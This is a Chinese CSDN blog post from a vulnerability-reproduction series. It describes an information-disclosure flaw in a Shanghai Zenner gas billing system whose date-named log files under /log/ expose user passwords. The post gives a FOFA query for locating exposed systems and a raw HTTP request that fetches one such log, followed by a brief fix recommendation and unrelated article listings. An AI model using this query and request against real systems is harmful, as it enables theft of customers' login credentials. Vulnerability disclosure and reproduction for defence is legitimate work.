【漏洞复现】上海真兰燃气收费系统信息泄露漏洞

最新推荐文章于 2024-10-10 14:15:00 发布
最新推荐文章于 2024-10-10 14:15:00 发布
阅读量403 收藏 6
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135699330
版权
【漏洞复现】 专栏收录该内容
150 篇文章 1 订阅

已下架不支持订阅

本文介绍了上海真兰燃气收费系统存在的信息泄露漏洞,详细描述了漏洞情况,包括攻击者如何通过遍历log目录下的日志文件获取用户登录密码等敏感信息。此外,还提供了产品的主页查询方式及修复建议,建议联系软件厂商解决此问题。
摘要由CSDN通过智能技术生成

Nx01 产品简介

        上海真兰仪表科技股份有限公司,成立于2011年,真诺测量仪表成员,位于上海市,是一家以从事仪器仪表制造业为主的企业。

Nx02 漏洞描述

        上海真兰仪表科技股份有限公司燃气收费系统存在信息泄露漏洞,log目录下记录日志信息使用log+年月日的格式来记录,攻击者通过遍历日志信息获取用户登陆密码等信息。

Nx03 产品主页

fofa-query: app="上海真兰燃气收费系统"

Nx04 漏洞复现

log路径下遍历年月日进行获取敏感信息。

POST /log/log20210820.txt HTTP/1.1
Host: {
  {Hostname}}
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
专栏目录

已下架不支持订阅

德国真兰空调计费系统解决方案.doc
07-08
德国真兰空调计费系统解决方案是基于德国 Zenner 公司的产品和技术,结合上海至信实业有限公司的销售和服务网络,提供了一整套中央空调(集中供能)分户计量系统解决方案。该解决方案涵盖了热量表系列、水表系列、...
14通往广场的路不止一条(邝真兰).docx
11-09
《通往广场的路不止一条》是一篇充满哲理的课文,收录在人教版小学五年级上册语文教材中,属于第四单元“生活中”的启示篇章。这篇文章讲述了作者小时候随父亲登高看到罗马广场的景象,父亲的一句“通往广场的路不止...
时间计量空调计费方案.pdf
01-06
上海至信实业有限公司作为德国真兰公司的一级代理商,专业提供中央空调分户计量系统整体解决方案,拥有丰富的项目经验和优质的产品服务。 ### 一、按面积收费的弊端 1.1 **恶性消费与能源浪费**:按面积收费导致...
EVC300智能体积修正仪 (真正PDF版)
01-10
特别地,它支持内嵌GPRS等无线通信模块,可以构建各种形式的无线通信网络,实现远程监控和管理,适用于城市燃气、石油、化工、冶金等领域,作为气体流量计的理想配套设备。 在安全措施方面,EVC300智能体积修正仪...
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2178
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
个人网络安全的几个重点与防御
nn_84的博客
10-03 444
2 防火墙 大家都用windows 只需在 gpedit.msc 设置 但有什么未知漏洞就不得而知了 因为美国的计划问题。1 浏览器 firefox 这是第一选择 如果你真的不明白可以找找各个浏览器漏洞。3 移动设备带来的危害 比如u盘 等 对于你们认为杀毒可以 那免杀还干吗呢。网络端口溢出漏洞 但防火墙和随机地址的原因 已经可以防御。提权 这是以后遇到的问题 有些漏洞不是随机地址能够阻止。mail 的危险的 来自与代理和漏洞。浏览器溢出漏洞 实时注意更新就可以。
《网络安全:数字时代的坚实护盾》
一名资深Java工程师的技术分享
10-10 250
在当今高度数字化的时代,网络安全的重要性如同空气对于生命一般不可或缺。它不仅关乎个人的隐私与财产安全,更对企业的生存发展和国家的稳定繁荣起着至关重要的作用。
什么是网络安全
m0_66268916的博客
10-07 501
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露
网络安全(黑客)自学
白帽子凯哥聊黑客
10-10 1209
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
10-10 900
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
高效查找服务器漏洞
2401_85592408的博客
10-07 386
11. 使用专业工具:可以使用如OSV-Scanner、Sqlmap、Wapiti、ZAP、CloudSploit、Firmwalker、Nikto2、OpenSCAP等专业工具来检测不同类型的漏洞。3. 服务识别:识别运行在开放端口上的服务及其版本,这可以通过Nmap的版本检测功能或Metasploit的辅助模块来完成。1. 信息收集:首先需要收集目标服务器的相关信息,包括开放的端口、运行的操作系统、应用程序及其版本等。12. 持续监控:安全是一个持续的过程,需要定期重复上述步骤来检测新出现的漏洞
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-10 1840
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-10 799
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
如何减少网络安全事件的损失
A526847的博客
10-07 461
综上所述,减轻网络安全事件的损失需要综合运用多种措施,从数据备份、访问控制、网络安全防御、安全事件响应、安全培训、法律合规以及安全评估与审计等多个方面入手,全面提升网络系统安全性和防护能力。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
10-08 935
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2674
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件。
等保测评的持续改进机制:构建动态安全防御体系
A526847的博客
10-07 341
在数字化转型的浪潮中,企业应重视等保测评的持续改进机制,不断提升网络安全防护水平,为业务的持续稳定发展提供坚实保障。:企业需要全面、深入地分析等保测评结果,了解信息系统安全管理、安全技术、安全运维等方面的得分情况,以及存在的具体安全问题和不足。:在等保测评的持续改进过程中,企业应积极引入先进的技术和创新方法,如AI辅助安全分析、零信任网络架构等,以提升防御能力和响应速度。:实施改进措施后,企业需要建立持续监控和评估机制,对信息系统安全状况进行实时监控和评估,确保改进措施的有效性。
Web安全 - 安全防御工具和体系构建
小工匠
10-03 1504
最终,设计一个适合公司的安全体系,既是对安全人员技术能力的考验,也是对其与业务发展需求契合度的挑战。安全防御工具只是辅助,最终的效果取决于如何选择和实施它们。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值